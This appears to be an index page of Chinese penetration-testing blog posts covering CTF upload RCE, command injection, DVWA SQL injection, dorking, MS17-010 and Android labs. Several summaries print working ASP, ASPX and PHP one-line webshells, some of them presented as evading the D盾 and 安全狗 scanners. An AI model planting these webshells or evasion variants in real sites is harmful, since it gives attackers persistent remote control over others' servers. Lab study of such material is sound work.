摘要： 一、题目： 二、查看网页源码： 获取上传文件仅：jpg、png,且说明上传python 三、使用vim创建包含python代码的jpg文件 import os os.system('ls /') 上传成功，存在远程执行漏洞 查看flag import os os.system('cat /flag' 阅读全文

摘要： 命令执行漏洞原理： 操作系统中& 、&&、 |、 ||都可以作为命令连接符使用，通过浏览器提交执行命令，如果服务器没有针对执行命令过滤，导致没有制定绝对路径的情况下就执行命令。 防御：设置黑名单过滤 ，src_replace ，替换 baidu.com&ip a 阅读全文

摘要： order by 猜解字段union 联合查询 列数相同 布尔注入 判断条件真假 猜测闭合 使用单引号或者双引号 ' "' or 1 =1 -- ' http://192.168.10.157/dvwa/vulnerabilities/sqli/?id='or 1=1 -- '&Submit=Sub 阅读全文

摘要： aspx木马收集： <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法： <%@ Page Language="Jscript"%><%eval(Reque 阅读全文

摘要： 珍藏版： 一个简单的过D盾的免杀php <?php $ab = $_REQUEST['d']; $a['t'] = "";//主要带对象 D盾就不管后面的了。。。 eval($a['t'].$ab); 过狗过D盾 <?php $a = $_REQUEST['d'];//参数 $a = "$a";// 阅读全文

摘要： 一句话木马：ASP篇 ASP一句话木马收集： <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> 阅读全文

摘要： 环境 虚拟机 ：VMFusion 11.5.0 专业版 使用VMFusion加载OAWAS靶机虚拟机文件。 low难度 判断是否存在注入点，主要分为显示(报错)注入和延时注入（盲注）。 输入参数1 ，页面正常有回显位，输入的内容在url中可见，说明是get类型传参，参数是id 查看闭合方式 1 an 阅读全文

摘要： 将使用以下工具对此进行演示 Mac OS 注意：此实验仅用于教育目的，任何非法活动概不负责。 常用 符号： -key 强制结果不出现关键词 *key* 模糊搜索，强制结果包含此关键词 “key” 强制搜索结果出现此关键词 site： 搜索指定的域名的网页内容 语法 site ：域名 # site:z 阅读全文

摘要： 我们将使用以下工具对此进行演示 厉害的Linux win7 VMware或VirtualBox（虚拟环境） 注意：此实验仅用于教育目的，任何非法活动概不负责。 测试目的： 通过实施针对性的渗透测试，发现win7系统的安全漏洞，复现ms17-010，熟悉渗透测试流程。 测试范围： 本次测试的范围详细如 阅读全文

摘要： 介绍 我们将使用以下工具对此进行演示 厉害的Linux Android设备 VMware或VirtualBox（虚拟环境） 注意：此实验室仅用于教育目的。作者和/或Infosec对用户执行的任何非法活动概不负责。 步骤一：启动厉害的Linux， 模块模糊搜索：search android/me 这里 阅读全文